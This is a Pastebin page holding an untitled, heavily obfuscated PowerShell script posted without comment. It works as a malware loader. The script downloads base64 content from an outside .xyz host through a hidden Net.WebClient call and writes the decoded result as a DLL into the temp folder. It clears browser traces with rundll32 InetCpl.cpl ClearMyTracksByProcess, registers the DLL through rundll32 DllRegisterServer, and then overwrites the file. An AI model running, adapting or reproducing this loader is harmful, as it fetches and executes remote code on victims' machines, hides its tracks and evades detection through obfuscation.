SHARE
TWEET

Untitled

a guest Jul 17th, 2019 87 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. &('sal') ('YY') ('nEw-OBjEcT')
  2. &('sal') ('MU') ('ieX')
  3.  
  4. ${Nw}=2*2
  5. .("sal") ('Zs') ("Get-Date")
  6. .("sal") ('Qq') ("rundll32")
  7. ${tA}=.("Get-Counter")
  8.  
  9.  
  10. ${I`i}=('https://woeiuyfgowe.xyz/image.php')
  11. ${iI}="${ii}?"+(.('Zs') -Format ('o')).('substring').Invoke(0,27)
  12. ${e`z}=('Net.WebClient')
  13. function r`R([string] ${t`EE}){${l} = @{}
  14.  ${L}.'
  15. ' = 'T'
  16.  ${l}.'_' = 'V'
  17.  ${l}.'-' = 'A'
  18.  Foreach(${e} in ${L}."kE`ys"){${T`eE} = ${t`EE}.('Replace').Invoke(${E}, ${L}.${e})}return ${T`Ee}}
  19. &('Set-Variable') ('43U') ${Ii}
  20. .('Set-Variable') ('4H') ${Ez}
  21. &('dir') ('ect*')
  22. .('Set-Variable') ('wm') (&(&('GI') ('Variable:/E*onte*'))."V`ALUe".(((.('GI') ('Variable:/E*onte*'))."vAl`UE"|&('Member'))[6]."nA`Me").('GetCmdlet').Invoke((.('GI') ('Variable:/E*onte*'))."val`UE".(((&('GI') ('Variable:/E*onte*'))."V`AlUe"|&('Member'))[6]."n`AMe").(((&('GI') ('Variable:/E*onte*'))."vAL`UE".(((.('GI') ('Variable:/E*onte*'))."v`ALuE"|.('Member'))[6]."N`AmE")."P`so`BjeCT"."m`eThODS"|.('?'){(.('DIR') (('Variable:X6r_') -Replace  ([ChaR]88+[ChaR]54+[ChaR]114),[ChaR]92))."V`AluE"."nA`mE"-like('*nd*e')})."n`Ame")."Invo`kE"(('N*ct'),1,${T`Rue}))(&('Variable') ('4H'))."VA`LUe")
  23. &('Set-Variable') ('Gu') ((((.('GCi') ('Variable:wm'))."V`Alue"|.('Member'))|.('?'){(&('DIR') (('Variable:Z1m_') -RePlacE'Z1m',[ChAr]92))."V`AluE"."Na`me"-like('*wn*g')})."N`AMe")
  24. ${Ly}=(&('gCi') ('Variable:wm'))."vA`LUe".((&('GCi') ('Variable:JhRGu')."r`e`plAce"(([cHar]74+[cHar]104+[cHar]82),[StRinG][cHar]92))."VAl`Ue")."iNV`okE"((&('GCI') ('Variable:/43U'))."val`UE")
  25. ${gA}=${EN`V:T`eMp}
  26. ${G`g}=(${D} = &('gci') ${g`A}|&('get-random'))."n`AMe" -replace ".{4}$"
  27. ${WY}=${GA}+'\'+${gg}+'.'
  28. ${eT} = 1234
  29. ${N`Y} = $env:temp\\213.dll
  30. [io.file]::"wr`IteAL`lB`YtES"(${w`Y},[Convert]::('FromBase64String').Invoke((.('RR')(${N`y})).('replace').Invoke(' ','')))
  31.  
  32. .('sleep') 9
  33. &('Qq') ('InetCpl.cpl'),('ClearMyTracksByProcess') 260|&('Qq') ('/s') ${w`Y}, ('DllRegisterServer')
  34. &('sleep') 55
  35. .('sl')
  36. [io.file]::"WRI`TEaLl`LiN`ES"(${w`y},[regex]::('replace').Invoke(${NY},(('2hmd')  -RepLAcE ([CHar]50+[CHar]104+[CHar]109),[CHar]92),'.'))
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top